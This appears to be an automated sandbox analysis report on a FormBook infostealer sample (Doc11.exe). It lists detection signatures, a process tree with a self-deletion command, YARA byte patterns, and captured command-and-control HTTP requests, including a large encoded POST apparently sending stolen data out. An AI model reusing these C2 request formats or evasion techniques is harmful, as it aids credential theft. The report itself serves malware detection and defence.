Loading ...

Play interactive tourEdit tour

Analysis Report Doc11.exe

Overview

General Information

Sample Name:Doc11.exe
Analysis ID:288546
MD5:f7ad3b59548788a59172b6477a1b83f0
SHA1:3b042b49ac135f38824de3665a051a7631e98782
SHA256:f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5
Tags:FormBook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Doc11.exe (PID: 4936 cmdline: 'C:\Users\user\Desktop\Doc11.exe' MD5: F7AD3B59548788A59172B6477A1B83F0)
    • RegAsm.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4464 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 5952 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xc4a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc712:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x18245:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17d31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x18347:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x184bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xd12a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16fac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xde23:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1de37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.RegAsm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.RegAsm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18349:$sqlite3step: 68 34 1C 7B E1
        • 0x1845c:$sqlite3step: 68 34 1C 7B E1
        • 0x18378:$sqlite3text: 68 38 2A 90 C5
        • 0x1849d:$sqlite3text: 68 38 2A 90 C5
        • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RegAsm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Doc11.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: Doc11.exeVirustotal: Detection: 34%Perma Link
          Source: Doc11.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Doc11.exeJoe Sandbox ML: detected
          Source: 2.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Doc11.exe.6320000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi
          Source: global trafficHTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: global trafficHTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
          Source: global trafficHTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 185341Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 4c 38 34 75 46 58 45 77 73 6a 6d 48 36 6c 54 32 43 6f 2d 52 7a 53 46 4a 33 42 74 56 61 78 6d 77 4a 73 59 4b 7a 76 6a 66 30 4a 77 32 53 6e 75 55 79 4d 48 41 4e 43 6d 36 4a 7e 74 4b 34 48 56 67 6d 6e 54 6c 73 70 73 68 43 59 74 43 75 64 54 44 6a 74 58 57 31 53 64 65 54 36 33 4d 6b 74 4b 66 66 41 4f 66 5a 4b 5f 43 76 73 4c 36 5f 55 47 6f 4b 75 33 6b 39 54 70 66 6d 67 35 63 71 50 32 50 66 47 71 39 75 53 65 76 66 6f 42 6c 6f 7a 33 32 5f 74 4c 74 65 57 51 38 30 4f 6e 54 65 4f 36 37 4e 35 64 4b 4e 76 69 4e 63 48 6e 56 6d 69 4a 6e 68 57 59 38 76 33 53 6c 70 30 64 75 4c 70 4e 51 53 54 6f 44 59 51 58 37 62 48 68 4d 4c 55 32 66 77 61 30 38 68 6b 73 59 34 47 55 41 31 49 47 6e 44 55 34 55 4d 72 78 53 62 75 63 30 34 74 6f 33 56 4e 62 41 71 4a 7a 47 65 55 62 4e 6e 54 35 52 5f 55 51 69 34 61 72 65 49 61 4f 63 72 76 39 76 36 50 4d 46 51 6a 63 73 41 79 41 56 72 41 70 32 79 6f 69 42 59 57 57 32 65 44 73 6a 50 77 71 49 51 48 75 66 42 6e 6e 55 43 74 61 59 52 73 32 51 69 28 67 4e 6c 53 4b 4e 59 4f 44 61 62 64 50 43 36 65 68 52 30 74 48 6d 6c 6a 75 47 48 58 49 50 55 44 49 5a 6e 74 6d 6b 66 49 72 46 32 62 6b 62 30 73 36 5a 5f 31 53 59 6f 6d 71 7a 43 4b 4d 45 6b 68 67 38 71 50 71 6c 2d 64 6d 6c 44 54 76 6c 73 48 7a 6b 37 44 73 6c 4b 35 65 64 6f 6a 4d 53 39 4e 73 5a 53 76 67 78 6f 51 38 7a 5a 65 77 68 39 74 34 76 4b 58 46 31 4d 76 74 6c 6b 35 36 28 4b 41 35 36 70 61 55 54 37 32 4b 44 6c 50 47 41 42 79 31 62 39 30 56 38 73 6e 6e 65 39 7e 6e 36 66 28 41 75 58 28 4f 57 69 68 5f 4d 37 66 73 47 6b 7a 4d 4a 6c 73 74 77 4c 6d 5a 66 49 61 67 4c 71 6c 4b 62 4c 7e 4b 63 48 6a 69 62 75 51 4f 4e 55 74 37 30 36 6f 41 45 73 4e 51 34 69 48 53 30 2d 62 51 28 37 56 44 62 42 35 4d 4a 4e 6d 78 70 58 47 48 55 66 6b 65 4a 75 67 62 51 46 58 49 7a 30 51 4d 6e 63 49 31 52 75 69 59 76 36 65 76 6f 70 54 35 51 52 52 30 48 2d 44 43 50 42 67 65 62 34 30 7a 62 79 50 4f 37 47 78 75 4d 43 48 69 41 35 4c 53 39 37 43 72 30 67 4d 42 7a 55 4e 71 67 31 4e 42 52 53 48 62 7e 68 28 56 63 68 7e 2d 76 37 30 36 7e 39 68 65 6c 48 6b 62 61 77 7e 65 6e 33 6f 2d 57 5a 63 4a 73 47 63 72 4b 48 67 67 68 55 74 44 33 35 47 53 7e 5f 4e 53 54 65 68 5a 72 51 68 7a 32 4f 38 30 68 61 57 37 69 62 53 71 52 43 61 51 64 69 55 64 76 71 5a 4a 6a 78 4e 4c 76 6a 47 4d 4f 36 71 4a 47 70 63 4a 52 63 69 77 30 6f 30 77 46 6c 52 6b 43 38 36 5f 67 4f 65 32 68 57 76 57 79 34 4b 4e 54 72 4d 56 6c 5a 36 6f 41 78 7e 6f 5a 66 34 58 6b 39 38 58 62 73 45 6e 47 67 4b 47 55 4d 65 5a 50 46 63 4d 38 5f 53 70 78 49 42 6f 31 6d 56 6b 66 61 68 79 36 4f 58 30 68 6a 30 68 38 41 77 31 64 43 4b 36 6c 6f 54 67 4f 4e 51 64 7e 64 6b 7
          Source: global trafficHTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.chelsescompass.com
          Source: unknownHTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmpString found in binary or memory: http://www.snacklabbet.com
          Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmpString found in binary or memory: http://www.snacklabbet.com/dfc/
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/parking-skylt.png
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/js/respond-js/respond.src.js
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/extra-pages-alt.css
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
          Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
